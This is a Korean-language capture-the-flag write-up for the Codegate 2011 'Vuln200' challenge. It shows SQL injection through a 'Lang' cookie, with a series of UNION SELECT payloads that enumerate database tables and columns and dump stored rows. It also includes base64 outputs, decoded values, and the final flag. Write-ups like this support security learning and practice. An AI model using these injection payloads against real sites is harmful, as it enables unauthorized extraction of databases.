[Codegate 2011] Vuln200

일반 아이디로 접속시 <!-- hint 0 -->

Hint1) The flag is hash string.

Hint2) Get Administrator account

Administrator/a 로 접속시 <!-- hint 1-->

쿠키 Lang를 빈칸이나 쿼터를 넣고 보내면 sql 오류발생, sql injection

'union select (select group_concat(table_name) from information_schema.tables),1#

'union select (select * from raw_data),1#                   //x

'union select (select * from raw_data limit 0,1),1# //x

'union select (select group_concat(database(),0x3a,user())),1# //x

'union select (select column_name from information_schema.columns where table_name='raw_data' limit 0,1),1# //data_id

'union select (select column_name from information_schema.columns where table_name='raw_data' limit 1,1),1# //data_value

data_value를 뒤져보는데 20번째 까지 쓰레기 값이 나옴

'union select (select data_value from raw_data limit 0,1),1#

MTEzNTk3NzI3MTMxMTQ0MjkzOTcxNjgyNDkyNDg2Mzg3NjM2MzE4MTExMjI1NTM0ODMxODg5OTI5MjU3ODg1NjQ4Mjc4M

Tc4MTkxNjU0MTM2MTE0MTE2OTMyNjE5MjY0OTgyNzk5NjE4NzYzMTY1Njc2MTc2Njc4NzQ5NzU2MjU1MzM0Mzg0MTYxND

Y2OTM0NTMyMTk4ODYyNzQ3NDUyODg0MjEzNTI5NjY1MjU4NjkyNzkxNjg3ODY=

 

11359772713114429397168249248638763631811122553483188992925788564827817819165413611411693261926498279961876316567

617667874975625533438416146693453219886274745288421352966525869279168786

 

5뾯q1B뱱괞$?v61?"U4?뎿뭌늊H'걒Tai2a뭗?셙놻Vvfxt뾙%S48AaFi4S!쁿'GE(?5)fRXi'멻x

 

'union select (select data_value from raw_data limit 1,1),1#

MTU5Njc3NTI4NjU0ODQ5NDgyODc3Nzg1NzgxNTU4MTY0OTMyNzczNjQ3OTIxOTU5MjQ2OTE1NDczNTI4NDM1NzM3ODk1Mj

U4ODUxOTU1ODY5NTU5OTk3MzQ5MTgyNTU1MzQ0NzY5NjQ0NjQ4MjM1MTcxMTc5Nzk0NjEyODY3MzgyNzY3NjMyOTk2OD

E4MzI2NDIzMzkzNzY0ODQ5Njc4NzQ1NTE3NjE3Mjg3MTI5NjYyOTgxMzU2NjQ=

 

15967752865484948287778578155816493277364792195924691547352843573789525885195586955999734918255534476964464823517

117979461286738276763299681832642339376484967874551761728712966298135664

 

'union select (select data_value from raw_data limit 2,1),1#

MTY5ODU3MzkyMzc4MzQxMjIxNDE3OTM2ODM4NDk1NzExNzg1NDI1NTQzMzc3NDk5NDQ5MTQzNzI1NTU1OTM1MTk0Nj

M1MTg4NDI2MTU2OTk5OTkzMjY1NzIxMjI0NzIzMTg2NTk0NDM1MTQxNjQ5NTQ5ODU2NDM3NTQ5ODIyMjI5NzY4MjExNzE1

NzY4NzIyNjE3MjU5OTk0ODg1MTk3OTczODk0OTc0NDQxMjIyNDczMTk3OTg2NDc=

 

'union select (select data_value from raw_data limit 3,1),1#

NTk4NTY3Mzg2MjM1ODY4MzY5NDgzMjE0MTc0OTQ3Nzg2NTMyMzUxODczMzY5Mjg2MjM0NTQ0ODUyMjU1ODI0NTc3NzE

zODg5MjI1MTM0NzQ2MTgxNTY2NzgxMjczNjIxMzkxNTc4NTkxMTEzNDc2MTc1MjMyNzk5ODI2Mjc4MjE3MzY1MjE0MjE0N

DUxMTU4NTcyNzUxNjQzMjU5OTcxNjk2MTE2NTM3ODYyODc3NzM0ODk5OTUzMjc=

 

5985673862358683694832141749477865323518733692862345448522558245777138892251347461815667812736213915785911134761

7523279982627821736521421445115857275164325997169611653786287773489995327

 

'union select (select data_value from raw_data limit 4,1),1#

NzI2NTIzNTc0NjQ4ODE2NTM1MjkzNDQxNDM5ODUyNjMzMjg0NTMyODk1Njc2MzI4ODM4MTcyMjE1MjkxMzU0NTcyODI1M

TE0NTcyMTkzOTg2NzgzOTE0NTI0NTQ5OTk3Mjg5Njg5MTM2MjQ2NDM0MTEzMzE0NzU1MTE5MTk4NzE3Njc1NTg4MjkyNz

Q1MjQ1NDc1NzQxMzUxMjU5MTMxNzg3MzQ1MTU1MzM5NzQ0MzgxODU1ODg5ODE=

 

'union select (select data_value from raw_data limit 5,1),1#

NTgyNzg4NjYyOTIyNTY0NzYyMTk0ODkyNDQxMjQ5Mzk4NDY2MzIzNDI0NTYxOTM2MTM2NDI1NjU5Nzc0NjEzNDQ5MTYyND

kzODU5ODQyNTQ1MTg3NjUzNjMxOTkxMzQ0MjQxMzgxNjY2NTUxNzE1MzIzOTc4MjMxMjM5MjUzNjc3Nzk2ODYyNDE3ND

g3ODE5Mjk2MTE5MTMyMTQ3NDE0Mjg0NzY5OTkxNzQ4NTI4NDM4OTQ4OTQyMjU=

 

'union select (select data_value from raw_data limit 6,1),1#

NTg5NjMxNDY4OTY4OTY1MzU5NDQ0NzM0MTEzNTM0MTgzOTQ1OTgyODc3NjY0MTk5MTQzNDI1NzM2MTc5NDg3NzcxMj

c4MzU2MTIzNDIyNDM2Nzc3MzQ5OTQ3ODg1NTUzNTcxNDk1MTE3MzU5NTgyMTU4NzczNzY3NDU1OTkxMjU3Mjg3Nzg3ND

IyNDYxNTc1NDQzNjE5MzU0NzQzODY4NTg2MjY1OTE3MjQ0MjgxNzI1OTg1OTExMzg=

 

....

'union select (select data_value from raw_data limit 20,1),1#

iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKAQAAAAClSfIQAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAHolA

ACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAAAaSURBVHjaYvzPwMTAwMTwkYnhLSOUjUCAAQBVVwPvE

oyQEAAARkxBRzozOTFjZTcwYWQzZGJhODIyNjExY2U1YTYxZWI3MTI1ZQAASUVORK5CYII=

FLAG:391ce80ad3dba822611ce5a61eb7125e